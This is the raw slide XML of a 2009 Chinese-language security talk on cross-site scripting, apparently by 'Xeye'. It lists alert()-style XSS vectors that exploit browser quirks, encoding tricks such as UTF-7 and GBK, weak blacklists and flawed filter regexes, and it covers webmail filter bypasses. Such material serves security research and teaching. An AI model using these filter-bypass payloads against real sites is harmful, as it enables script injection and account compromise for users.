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305" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="277" r:id="rId7"/>
    <p:sldId id="261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64" r:id="rId18"/>
    <p:sldId id="287" r:id="rId19"/>
    <p:sldId id="265" r:id="rId20"/>
    <p:sldId id="294" r:id="rId21"/>
    <p:sldId id="295" r:id="rId22"/>
    <p:sldId id="289" r:id="rId23"/>
    <p:sldId id="275" r:id="rId24"/>
    <p:sldId id="290" r:id="rId25"/>
    <p:sldId id="278" r:id="rId26"/>
    <p:sldId id="299" r:id="rId27"/>
    <p:sldId id="291" r:id="rId28"/>
    <p:sldId id="279" r:id="rId29"/>
    <p:sldId id="280" r:id="rId30"/>
    <p:sldId id="281" r:id="rId31"/>
    <p:sldId id="282" r:id="rId32"/>
    <p:sldId id="292" r:id="rId33"/>
    <p:sldId id="283" r:id="rId34"/>
    <p:sldId id="284" r:id="rId35"/>
    <p:sldId id="285" r:id="rId36"/>
    <p:sldId id="286" r:id="rId37"/>
    <p:sldId id="293" r:id="rId38"/>
    <p:sldId id="296" r:id="rId39"/>
    <p:sldId id="297" r:id="rId40"/>
    <p:sldId id="300" r:id="rId41"/>
    <p:sldId id="298" r:id="rId42"/>
    <p:sldId id="301" r:id="rId43"/>
    <p:sldId id="302" r:id="rId44"/>
    <p:sldId id="304" r:id="rId45"/>
    <p:sldId id="303" r:id="rId46"/>
    <p:sldId id="306" r:id="rId47"/>
    <p:sldId id="307" r:id="rId48"/>
    <p:sldId id="263" r:id="rId49"/>
    <p:sldId id="309" r:id="rId5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BF33"/>
    <a:srgbClr val="00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569" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="-129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2009-7-16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2009-7-16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2009-7-16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2009-7-16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2009-7-16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2009-7-16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2009-7-16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2009-7-16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2009-7-16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2009-7-16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2009-7-16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2009-7-16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xeye.us/blog/2009/04/textarea-innerhtml-not-encode-in-webki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hi.baidu.com/ycosxhack/blog/item/4078831c166c308d86d6b645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hespanner.co.uk/2009/05/08/opera-xss-vector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80vul.com/script_tag_fuzz/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xeye.us/demo/pseudo/javascript.tx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hi.baidu.com/aullik5/blog/item/0a4af8f3431ab21bb07ec57a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80vul.com/qqmail/QQmail%20Multiple%20Xss%20Vulnerabilities.htm" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://m348.mail.qq.com/cgi-bin/readmail?mailid=ZC1217iK5yq~a8ToGOBNZbWCXXXw86&amp;folderid=1&amp;t=readmail&amp;&amp;&amp;groupid=&amp;sid=Cks1q-OzUAjlT0gB&amp;disptype=html&amp;dispimg=1&amp;filterflag=tru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ookout.net/2008/01/27/firefox-renders-xmlns-xhtml-in-favor-of-xss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watchfire.com/FPI.ppt" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xeye.us/fpi.swf?url=http://www.evilsite.com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hi.baidu.com/ycosxhack/blog/item/c28fed54d7d0a35fd0090636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xeye.us/blog/2009/04/qq-xss-0day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baidu.com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businessinfo.co.uk/labs/hackvertor/hackvertor.php" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://code.google.com/p/browsersec/wiki/Main" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xeye.us/lab/xssee/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ha.ckers.org/xs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xeye.us/lab/xssor/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en/data_URIs" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.webappsec.org/projects/articles/071105.shtml" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.w3.org/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Cross-site_scripting" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xssed.com/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ites.google.com/site/tentacoloviola/backdooring-windows-media-fil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Cross Site Attack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Xeye 2009-07-11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smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0"/>
              <a:t>、浏览器解析处理差异导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" smtClean="0"/>
              <a:t>XSS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webkit textarea innerHTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://xeye.us/blog/2009/04/textarea-innerhtml-not-encode-in-webkit/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>对宽字节编码的处理方式差异</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>gbk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>编码的网页对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>%c3'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>处理，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ff/chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ie/opera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的默认处理方式不同</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…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smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0"/>
              <a:t>、浏览器特性导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0"/>
              <a:t>（一）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smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>*background</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>里的伪协议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>&lt;!--[if '&lt;script']&gt;&lt;script&gt;alert(/xeye/)&lt;/script&gt;&lt;![endif]--&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>反单引号的支持</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="420624" lvl="1" indent="-384048">
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" smtClean="0"/>
              <a:t>FF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>BODY{-moz-binding:url("xss-test.xml#xss")}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>E4X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的实例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>foo=&lt;foo&gt;&lt;id name="thx"&gt;x&lt;/id&gt;&lt;/foo&gt;;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>alert(foo.id);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>more from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://hi.baidu.com/ycosxhack/blog/item/4078831c166c308d86d6b645.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="420624" lvl="1" indent="-384048">
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3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smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0"/>
              <a:t>、浏览器特性导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0"/>
              <a:t>（二）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Opera</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>&lt;table background=javascript:alert(/xeye/)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.thespanner.co.uk/2009/05/08/opera-xss-vectors/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="420624" lvl="1" indent="-384048">
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3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smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0"/>
              <a:t>、浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" smtClean="0"/>
              <a:t>bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0"/>
              <a:t>导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" smtClean="0"/>
              <a:t>XSS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ie7/8 javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>伪协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://xeye.us/demo/pseudo/javascript.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;?php echo "&lt;script".chr(3337)."src='xss-test.js'&gt;&lt;/script&gt;";?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.80vul.com/script_tag_fuzz/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;img src='' onerror='alert(/xeye/)'&lt;/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…</a:t>
            </a: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smtClean="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0"/>
              <a:t>、编码问题导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" smtClean="0"/>
              <a:t>XSS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mtClean="0"/>
              <a:t>utf-7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>编码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>+ACI- onmouseover=+ACI-alert(/xeye/)+ADsAIg- x=+ACI-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>us-ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>编码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>high bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>%A2%BE%BCscript%BEalert(/xeye/);%BC/script%BE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>multi-byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>编码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>gbk, big5, euc-jp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>%c3'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>gbk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>编码环境下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的转义：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>%c3\'--&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>肻</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…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smtClean="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0"/>
              <a:t>、不完备的黑名单策略导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" smtClean="0"/>
              <a:t>XSS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mtClean="0"/>
              <a:t>要么黑名单，要么就白名单？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>总是有新元素出现，黑名单很可能就被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>标签的过滤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>html5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>出现新的标签：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>video/audio/canvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="420624" lvl="1" indent="-384048">
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" smtClean="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" smtClean="0"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" smtClean="0"/>
              <a:t>事件的过滤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>出现新的事件：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>onloadedmetadata, ondurationchanged, ontimeupdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://hi.baidu.com/aullik5/blog/item/0a4af8f3431ab21bb07ec57a.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…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smtClean="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" smtClean="0"/>
              <a:t>XSS Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0"/>
              <a:t>本身的缺陷导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" smtClean="0"/>
              <a:t>XSS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smtClean="0"/>
              <a:t>预留</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>开关</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://m348.mail.qq.com/cgi-bin/readmail?mailid=ZC1217iK5yq~a8ToGOBNZbWCXXXw86&amp;folderid=1&amp;t=readmail&amp;&amp;&amp;groupid=&amp;sid=Cks1q-OzUAjlT0gB&amp;disptype=html&amp;dispimg=1&amp;filterflag=true</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.80vul.com/qqmail/QQmail%20Multiple%20Xss%20Vulnerabilities.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>正则编写缺陷</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>s/script//g</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>s/script/xscript/ig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>s/[\x00-\x20\&lt;\&gt;\"\']//g</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>s/(url|script|eval|expression)/xxx/ig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>我们的目标是什么</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D05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很简单，就是合理地做坏事</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>一次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的过程其实就是一次完美绕过目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>xss filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的过程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下面是对“哪里可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>”部分的一些比较有代表性的案例进行分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0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89037" y="2714620"/>
            <a:ext cx="5611921" cy="830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CN" sz="4800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Bypass mail xss filter</a:t>
            </a:r>
